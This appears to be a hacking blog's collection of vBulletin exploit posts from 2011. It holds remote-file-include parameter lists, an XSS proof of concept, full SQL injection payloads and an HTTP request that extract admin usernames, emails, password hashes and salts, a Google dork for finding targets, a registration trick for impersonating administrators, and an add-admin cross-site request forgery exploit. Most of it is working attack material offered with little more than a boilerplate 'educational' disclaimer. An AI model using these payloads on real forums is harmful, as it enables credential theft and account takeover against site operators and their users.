lo0.ro cat /dev/null > stupidity – nobody is safe

1Nov/111

vBulletin Multiple Remote File Include Vulnerabilities

vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

vBulletin 4.1.7 is vulnerable; other versions may also be affected.

[cc lang="html"]http://www.example.com/vB1/api.php?api_script=[RFI]

http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]

http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]

http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]

http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]

http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]

http://www.example.com/vB1/includes/class_block.php?file=[RFI]

http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]

http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]

http://www.example.com/vB1/includes/functions.php?classfile=[RFI]

http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]

http://www.example.com/vB1/vb/vb.php?filename=[RFI]

http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]

http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]

http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] [/cc]

Tagged as: , , , 1 Comment
3Aug/110

vBulletin Cross Site Scripting Vulnerability

Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1

PoC:

[cc lang="html"]http://www.example.com/forums/admincp/?";>[/cc]

Happy educational purpose testing! :)

Tagged as: , , , , No Comments
21Jul/110

vBulletin “Search UI” SQL Injection 0-day – part II

vBulletin "Search UI" SQL Injection

PoC:

[cc lang="html"]POST /search.php?do=process HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* [/cc]

will retrun:

[cc lang="html"] [/cc]

Tagged as: , , , , , No Comments
21Jul/112

Vbulletin 4.0.x -> 4.1.3 SQL injection Vulnerability 0-day

So... after the patching done 2 months ago by vBulletin team here it is:

Vulnerability:
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

[cc lang="html"]&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#[/cc]
Exact request:

Exact Request as follows:

Code:
[cc lang="html"]query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#[/cc]

Google dork: intitle: powered by Vbulletin 4
Author: FB1H2S
Found his blog. Awesome posts.

Tagged as: , , , , , , 2 Comments
6Jun/110

vBulletin – Registration Bypass Vulnerability

1. Check the names of the admins/moderators on the forums

2. Go to Http://[localhost]/path/register.php

3. [cc lang="html"]Type this at User Name ===> ADMIN_username�[/cc]

4. [cc lang="html"]� is an ASCII Code[/cc]

5. complete the other parameters

6. Then click on Complete Registration

7. Now you see that your user name like admin user name

8. PM the moderators to elevate your account or promote another user. (or other nutty things)

(this is old but its still working)
Author: Immortal Boy
Iranian Datacoders Security Team

Tagged as: , , No Comments
31May/112

vbulletin 4.X.X Add Admin XSRF Exploit

#Title : vb 4.X.X Add Admin XSRF Exploit
#Author : Mon7rF
#Mail : x0h@msn.com
#Date : 2011 - 6 - 29

---------------------------------------------[Exploit]-----------------------------------------------

 

User Name     :  

Password : 

e-Mail     :

---------------------------------------------[The End]-----------------------------------------------
Important Notices :
Modify the code adminhash
How?
1- Go to http://localhost/vb/admincp
2- View Page Source
3- Search for var ADMINHASH Then Copy --- http://store3.up-00.com/May11/6q673901.png
4- Paste instead hash is here ! --- --- http://store3.up-00.com/May11/8AO73901.png

Greets : RENO - ArHabY-HacKeR - FoX HaCkEr - Hamoud-Oz - All p0c.cc members

source

Tagged as: , , , 2 Comments
   

Add to Google

Disclaimer

This website was created for educational purposes. The owner will not take any responsibility for any action you cause using the information shown in this website. Please do not contact me with blackhat type hacking requests. Thanks

Categories

Tags

backup backup exec bruteforce debian directadmin DoS download exploit hack hacking how-to install install windows 7 lfi linux pentest perl php poc python rfi scanner script scripts secure code Security security scanner share shell social engineering source code sqli SQL injection sqli scanners ssh tool tools tutorial upload shell vbulletin Web Application Scanner windows windows 7 usb wordpress xss

Meta